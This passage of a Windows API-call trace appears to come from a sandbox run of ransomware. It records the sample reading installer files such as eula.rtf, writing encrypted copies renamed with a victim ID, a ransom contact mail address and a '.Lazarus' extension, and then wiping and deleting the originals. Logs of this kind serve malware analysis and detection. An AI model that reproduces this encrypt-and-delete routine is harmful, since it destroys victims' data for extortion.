Flags=0x0, Size=0x20) returned 0x885b8 [0062.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.201] AreFileApisANSI () returned 1 [0062.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0062.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 36 [0062.201] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b)) returned 1 [0062.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0062.201] AreFileApisANSI () returned 1 [0062.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0062.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0062.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0062.202] GetLastError () returned 0x0 [0062.202] SetLastError (dwErrCode=0x0) [0062.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e298 [0062.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0062.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0062.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0062.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0062.202] GetLastError () returned 0x0 [0062.202] SetLastError (dwErrCode=0x0) [0062.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0062.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0062.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x693f0 [0062.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0062.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75b70 [0062.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0062.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0062.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0062.202] AreFileApisANSI () returned 1 [0062.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0062.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0062.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0062.202] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0062.211] GetFileType (hFile=0x420) returned 0x1 [0062.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0062.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0062.211] AreFileApisANSI () returned 1 [0062.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0062.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0062.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 36 [0062.211] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.211] GetFileType (hFile=0x428) returned 0x1 [0062.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0062.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0062.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0062.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.211] GetLastError () returned 0x0 [0062.211] SetLastError (dwErrCode=0x0) [0062.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.211] GetLastError () returned 0x0 [0062.211] SetLastError (dwErrCode=0x0) [0062.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0062.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0062.212] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0xd5b, lpOverlapped=0x0) returned 1 [0062.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0062.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0062.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0062.236] GetLastError () returned 0x0 [0062.236] SetLastError (dwErrCode=0x0) [0062.237] GetLastError () returned 0x0 [0062.237] SetLastError (dwErrCode=0x0) [0062.237] GetLastError () returned 0x0 [0062.237] SetLastError (dwErrCode=0x0) [0062.237] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0062.237] GetLastError () returned 0x0 [0062.237] SetLastError (dwErrCode=0x0) [0062.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb) returned 0x7d5a0 [0062.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0062.237] GetLastError () returned 0x0 [0062.237] SetLastError (dwErrCode=0x0) [0062.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0062.237] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0xd60, lpOverlapped=0x0) returned 1 [0062.238] GetLastError () returned 0x0 [0062.238] SetLastError (dwErrCode=0x0) [0062.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0062.238] GetLastError () returned 0x0 [0062.238] SetLastError (dwErrCode=0x0) [0062.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0062.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0062.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0062.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0062.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0062.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0062.239] CloseHandle (hObject=0x420) returned 1 [0062.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0062.240] CloseHandle (hObject=0x428) returned 1 [0062.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0062.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0062.240] AreFileApisANSI () returned 1 [0062.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0062.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69350 [0062.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x69350, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 36 [0062.240] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.241] GetFileType (hFile=0x428) returned 0x1 [0062.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0062.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0062.241] GetLastError () returned 0xb7 [0062.241] SetLastError (dwErrCode=0xb7) [0062.242] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0062.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0062.243] CloseHandle (hObject=0x428) returned 1 [0062.243] AreFileApisANSI () returned 1 [0062.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0062.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0062.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 36 [0062.243] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf")) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4f8 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0062.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.244] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0062.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0062.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0062.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0062.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0062.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0062.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0062.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0062.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0062.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0062.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0062.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0062.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0062.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0062.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0062.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0062.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0062.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0062.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0062.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0062.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0062.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0062.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0062.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0062.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0062.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0062.245] AreFileApisANSI () returned 1 [0062.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0062.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0062.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0062.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0062.246] AreFileApisANSI () returned 1 [0062.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0062.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0062.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 45 [0062.246] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.246] GetFileType (hFile=0x428) returned 0x1 [0062.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0062.246] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0062.246] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0062.246] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0062.247] CloseHandle (hObject=0x428) returned 1 [0062.247] AreFileApisANSI () returned 1 [0062.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0062.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0062.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 45 [0062.247] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.247] GetFileType (hFile=0x428) returned 0x1 [0062.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0062.247] CloseHandle (hObject=0x428) returned 1 [0062.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0062.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0062.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0062.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0062.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0062.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0062.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0062.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0062.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0062.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0062.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0062.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0062.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0062.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0062.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0062.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0062.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0062.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0062.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0062.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0062.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0062.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0062.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0062.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0062.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0062.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0062.248] AreFileApisANSI () 